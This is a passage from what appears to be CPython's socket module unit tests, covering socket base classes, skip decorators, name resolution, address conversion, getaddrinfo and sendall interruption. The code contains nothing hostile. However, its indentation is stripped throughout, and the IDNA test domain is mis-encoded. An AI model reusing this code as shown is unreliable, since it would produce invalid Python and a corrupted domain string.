# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'ะธัะฟััะฐะฝะธะต.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('ะธัะฟััะฐะฝะธะต.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
